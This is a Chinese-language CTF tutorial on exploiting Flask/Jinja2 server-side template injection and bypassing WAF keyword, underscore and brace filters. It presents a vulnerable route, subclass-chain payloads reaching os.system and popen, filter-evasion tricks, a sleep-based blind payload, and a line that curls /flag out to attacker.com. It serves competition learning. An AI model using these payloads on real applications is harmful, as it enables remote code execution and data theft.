CTF选手必看:Flask SSTI绕过WAF的N种奇技淫巧与Payload构造思路
CTF竞赛中的Flask SSTI高级绕过技术:从基础到实战
在CTF竞赛中,服务器端模板注入(SSTI)一直是Web安全赛道的经典题型。面对越来越严格的WAF规则,传统的payload构造方法往往难以奏效。本文将带您深入理解Flask框架下Jinja2模板引擎的底层机制,掌握一套系统化的绕过思路,而不仅仅是记忆几个现成的payload。
1. SSTI基础与引擎识别
1.1 理解模板注入的本质
模板注入之所以危险,在于它打破了代码与数据的边界。当用户输入被直接拼接进模板字符串时,Jinja2的语法解析器会将其误认为模板指令执行。与SQL注入类似,关键在于控制输入中的特殊字符(如{{}})来"逃逸"出数据上下文。
典型漏洞代码示例:
from flask import Flask, request, render_template_string app = Flask(__name__) @app.route('/vuln') def vulnerable(): name = request.args.get('name', 'Guest') template = f'<h1>Hello {name}</h1>' return render_template_string(template)1.2 快速识别模板引擎
在CTF比赛中,准确识别模板引擎类型是第一步。以下是针对Jinja2的特征检测方法:
- 数学运算测试:
{{7*7}}→ 49 - 字符串连接测试:
{{"a"+"b"}}→ ab - 特殊语法测试:
{{ self.__dict__ }}
不同引擎的差异对比:
| 测试payload | Jinja2输出 | Twig输出 | Django输出 |
|---|---|---|---|
{{'a'.upper()}} | A | A | 报错 |
{{7*'7'}} | 7777777 | 49 | 报错 |
2. 对象继承链的深度利用
2.1 Python对象魔术方法
Jinja2环境下可以通过魔术方法访问Python对象模型:
''.__class__ # → <class 'str'> ().__class__ # → <class 'tuple'> [].__class__ # → <class 'list'> {}.__class__ # → <class 'dict'> ().__class__.__base__ # → <class 'object'>2.2 子类挖掘技术
通过__subclasses__()可以获取所有继承自object的类,这是SSTI利用的核心跳板:
''.__class__.__base__.__subclasses__()实用查找技巧:
- 使用脚本自动化搜索关键类
- 重点关注以下危险类:
_frozen_importlib.BuiltinImportersubprocess.Popenwarnings.catch_warningsos._wrap_close
2.3 全局变量访问路径
通过__globals__可以访问函数的全局命名空间:
().__class__.__base__.__subclasses__()[X].__init__.__globals__其中常包含的关键模块:
ossys__builtins__importlib
3. 高级绕过技术实战
3.1 符号过滤的创造性解法
绕过双大括号限制
- 使用
{% if ... %}...{% endif %}结构 - 利用
{% with ... %}...{% endwith %}临时变量
示例:
{% with a='__cla',b='ss__' %}{% set c=a~b %}{{ ()[c] }}{% endwith %}处理下划线过滤
- Hex编码:
\x5f代替_ - 字符串拼接:
'__cla'+'ss__' - 过滤器反转:
{{ ()['__ssalc__'|reverse] }}
3.2 关键字过滤的艺术
动态字符串构造
{% set a=dict(cl='a',ass__='a')|join %}{{ ()[a] }}数学运算替代数字
{% set idx='aaaaa'|length %}{{ ''.__class__.__base__.__subclasses__()[idx] }}3.3 无回显场景下的利用
带外数据外传
{{ ''.__class__.__base__.__subclasses__()[X].__init__.__globals__['os'].system('curl http://attacker.com/?flag=`cat /flag`') }}时间盲注技术
{% if ''.__class__.__base__.__subclasses__()[X].__init__.__globals__['os'].system('sleep 5') == 0 %}a{% endif %}4. 防御对抗与实战思维
4.1 现代WAF的常见策略
| 防御层 | 典型措施 | 绕过思路 |
|---|---|---|
| 词法分析 | 黑名单关键字过滤 | 编码/拼接/上下文拆分 |
| 语法分析 | 模板语法结构检测 | 使用非常规控制结构 |
| 语义分析 | 危险函数调用监控 | 间接调用链 |
| 沙箱环境 | 限制系统调用 | 利用已有资源构造命令 |
4.2 实战中的思维框架
信息收集阶段:
- 确定模板引擎类型
- 枚举可用内置对象和方法
- 探测过滤规则边界
原型构造阶段:
- 建立最小可用payload
- 测试基础对象访问路径
绕过开发阶段:
- 分析过滤规则模式
- 设计等效替代方案
- 组合多种绕过技术
利用完善阶段:
- 处理字符长度限制
- 适应无回显环境
- 实现稳定利用
在最近的HackTheBox比赛中,一道SSTI题目要求选手在过滤了所有括号和点的限制下完成利用。最终解决方案是:
{% with a=request|attr('application')|attr('__globals__')|attr('__getitem__')('os')|attr('popen')('id')|attr('read')() %}{{ a }}{% endwith %}这种层层递进的思维方式,正是高级CTF选手区别于初学者的关键所在。记住,模板注入的本质是代码与数据的边界模糊,而绕过艺术的核心在于用系统的视角理解过滤逻辑,而非死记硬背payload。